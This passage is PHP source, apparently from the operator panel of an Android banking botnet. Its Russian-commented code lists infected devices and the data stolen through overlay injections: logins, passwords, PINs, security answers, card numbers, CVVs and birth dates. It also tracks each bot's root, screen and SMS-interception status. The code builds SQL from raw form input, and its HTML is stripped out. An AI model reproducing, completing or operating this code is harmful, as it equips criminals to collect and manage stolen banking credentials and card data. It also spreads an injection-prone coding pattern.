Data injections: "; ?>
exec('SET NAMES utf8'); $sql = "SELECT * FROM injs"; if(isset($_POST["click_log"]))//Открываем форму логи! { $log_IMEI = $_POST["click_log"]; echo ""; } if(isset($_POST["click_set"]))//Открываем форму настроек! { $set_IMEI = $_POST["click_set"]; echo ""; } if (preg_match("/kom_save/",print_r($_POST,true))) { $connection = new PDO('mysql:host='.SERVER.';dbname='.DB, USER, PASSWORD); $connection->exec('SET NAMES utf8'); $str = print_r($_POST,true); $str = str_replace("[kom_save","!!!",$str); $str = str_replace("]","@@@",$str); $massiv = explode("!!!", $str); $massiv = explode("@@@", $massiv[1]); $str = $massiv[0]; $comments = $_POST["komment$str"]; $statement = $connection->prepare("UPDATE injs SET comments = '$comments' WHERE id = '$str';"); $statement->execute([$comments]); $statement->execute([$str]); } if (preg_match("/delete/",print_r($_POST,true))) { $connection = new PDO('mysql:host='.SERVER.';dbname='.DB, USER, PASSWORD); $connection->exec('SET NAMES utf8'); $str = print_r($_POST,true); $str = str_replace("[delete","!!!",$str); $str = str_replace("]","@@@",$str); $massiv = explode("!!!", $str); $massiv = explode("@@@", $massiv[1]); $str = $massiv[0]; $statement = $connection->prepare("DELETE FROM injs WHERE id='$str'"); $statement->execute([$str]); } /****Ограничение по тегам****/ $userRights = new users_right; $tags = explode("|", $userRights->getPrivateTags()); $thisTag = explode(",", $tags[0]); $privateTag = explode(",", $tags[1]); /****************************/ $sql = "SELECT * FROM injs"; echo ""; foreach($connection->query($sql) as $row) { $id = $row['id']; $idbot = $row['idbot']; $country = $row['country']; $name = $row['name']; $login = $row['login']; $password = $row['password']; $params1 = $row['params1']; $params2 = $row['params2']; $pin = $row['pin']; $vopros1 = $row['vopros1']; $vopros2 = $row['vopros2']; $otvet1 = $row['otvet1']; $otvet2 = $row['otvet2']; $cc = $row['cc']; $monthyear = $row['monthyear']; $cvv = $row['cvv']; $f_name = $row['f_name']; $l_name = $row['l_name']; $phone = $row['phone']; $dateBrith = $row['dateBrith']; $logs = $row['logs']; $comments = $row['comments']; $imei_=""; $AndroidBot = "ID Bots: "; $AndroidOS = "Android: "; $Operator = "Operator: "; $country = "Country: "; $tag_ = "Tag: "; $connection2 = new PDO('mysql:host='.SERVER.';dbname='.DB, USER, PASSWORD); $connection2->exec('SET NAMES utf8'); $sql2 = "SELECT * FROM kliets"; foreach($connection2->query($sql2) as $row2) { if($row2['IMEI'] == $idbot) { $OS = $row2['version']; $oper = $row2['number']; $countr = $row2['country']; $lastConnect = $row2['lastConnect']; $tag = $row2['version_apk']; $l_log = $row2['log']; $admin = $row2['r00t']; $screen = $row2['screen']; $requestInjProc=$row2['requestInjProc']; $requestSMS=$row2['requestSMS']; //******Получаем иконку состояния бота, вычисляем дату**** $arr_data_from = explode(" ", $row2['lastConnect']); $arr_data_till = explode(" ", date('Y-m-d H:i')); $date_from = $arr_data_from[0]; $date_till = $arr_data_till[0]; $date_from = explode('-', $date_from); $date_till = explode('-', $date_till); $time_from = mktime(0, 0, 0, $date_from[1], $date_from[2], $date_from[0]); $time_till = mktime(0, 0, 0, $date_till[1], $date_till[2], $date_till[0]); $day = ($time_till - $time_from)/60/60/24; //получаем разницу кол-во дней! //----------Секунды!-------/ $date1 = new \DateTime($row2['lastConnect']); $date2 = new \DateTime(date('Y-m-d H:i')); $diff = $date2->diff($date1); // разница в секундах $seconds = ($diff->y * 365 * 24 * 60 * 60) + //получаем разницу в секундах! ($diff->m * 30 * 24 * 60 * 60) + ($diff->d * 24 * 60 * 60) + ($diff->h * 60 * 60) + ($diff->i * 60) + $diff->s; //----------обработка состояние иконки on/off-------/ if($day>=2)//Дни! { $img="images/icons/kill.png"; $getSortON_OFF="kill"; } else { if($seconds<=120) {$img="images/icons/online.png"; $getSortON_OFF="online";} else {$img="images/icons/offline.png"; $getSortON_OFF="offline";} } //************Иконки ЛОГОВ*************************************** if($l_log == "1") {$icon_log="images/icons/log_on.png";} elseif($l_log == "2") {$icon_log="images/icons/log_on_g.png";} else {$icon_log="images/icons/log_off.png";} if($admin == "1") {$icon_admin="images/icons/V.png";} else {$icon_admin="images/icons/X.png";} if($seconds<=120) { if($screen == "1") {$icon_screen="images/icons/V.png";} else {$icon_screen="images/icons/X.png";} } else { $icon_screen="images/icons/X.png"; } if($requestInjProc == "1") {$icon_requestInjProc="images/icons/inj_v.png";} else {$icon_requestInjProc="images/icons/inj_off2.png";} if($requestSMS == "1") {$icon_requestSMS="images/icons/sms_v.png";} else {$icon_requestSMS="images/icons/sms_x.png";} //----страны if($countr == "") $countr = "not"; $country = mb_strtolower($countr); $imei_ = "$idbot"; $AndroidBot = "ID Bots: $idbot"; $AndroidOS = "Android: $OS"; $Operator = "Operator: $oper"; $tag_ = "Tag: $tag"; break; } } if($_SESSION['panel_right']!="admin")//Ограничение по тегам { $boolContinue=true; if($tags[0]!=",") { foreach($thisTag as $tagZ) { if($tag == $tagZ) { if($tagZ!="") { $boolContinue=false; break; } } } if($boolContinue)continue; } else { foreach($privateTag as $tagZ) { if($tag == $tagZ) { if($tagZ!="") { $boolContinue=false; break; } } } if(!$boolContinue)continue; } }//--------------- /*$vopros1 = $row['vopros1']; $vopros2 = $row['vopros2']; $otvet1 = $row['otvet1']; $otvet2 = $row['otvet2']; $cc = $row['cc']; $monthyear = $row['monthyear']; $cvv = $row['cvv']; $f_name = $row['f_name']; $l_name = $row['l_name']; $phone = $row['phone']; $dateBrith = $row['dateBrith']; $logs = $row['logs'];*/ if($name!="")$name = "Name injection: $name
"; if($login!="")$login = "Login: $login
"; if($params1!="")$params1 = "Parameter 1: $params1
"; if($params2!="")$params2 = "Parameter 2: $params2
"; if($password!="")$password = "Password: $password
"; if($pin!="")$pin = "Pin: $pin
"; if($vopros1!="")$vopros1 = "Question 1: $vopros1
"; if($otvet1!="")$otvet1 = "Response 1: $otvet1
"; if($vopros2!="")$vopros2 = "Question 2: $vopros2
"; if($otvet2!="")$otvet2 = "Response 2: $otvet2
"; if($cc!="")$cc = "Number Card: $cc
"; if($monthyear!="")$monthyear = "Month/Year: $monthyear
"; if($cvv!="")$cvv = "CVV: $cvv
"; if($f_name!="")$f_name = "First name: $f_name
"; if($l_name!="")$l_name = "Last name: $l_name
"; if($phone!="")$phone = "Phone number: $phone
"; if($dateBrith!="")$dateBrith = "Date of birth: $dateBrith
"; $logs=str_replace("//br//","
",$logs); $inj = "$name$login$params1$params2$password$pin$vopros1$otvet1$vopros2$otvet2$cc$monthyear$cvv$f_name$l_name$phone$dateBrith$logs"; $infoBot = "$AndroidBot$AndroidOS$Operator$country$tag_"; $boolFIND = true; $boolFIND3 = true; $boolFIND4 = true; if(($getFind==null)||($getFind=="")||($getFind==" ")){ $boolFIND = true; }else{ if(!Сontains($inj, $getFind)) { $boolFIND=false; } if(!Сontains($comments, $getFind)) { $boolFIND3=false; } if(!Сontains($infoBot, $getFind)) { $boolFIND4=false; } } if($country=="Country: ")$country="not"; if(($boolFIND)||($boolFIND3)||($boolFIND4)) { if($AndroidBot!="ID Bots: "){ $icon="
"; }else{ $icon=""; } echo ""; } } echo ""; ?>
Comments

$AndroidBot
$AndroidOS
$tag_
$Operator
Country:
$icon

$inj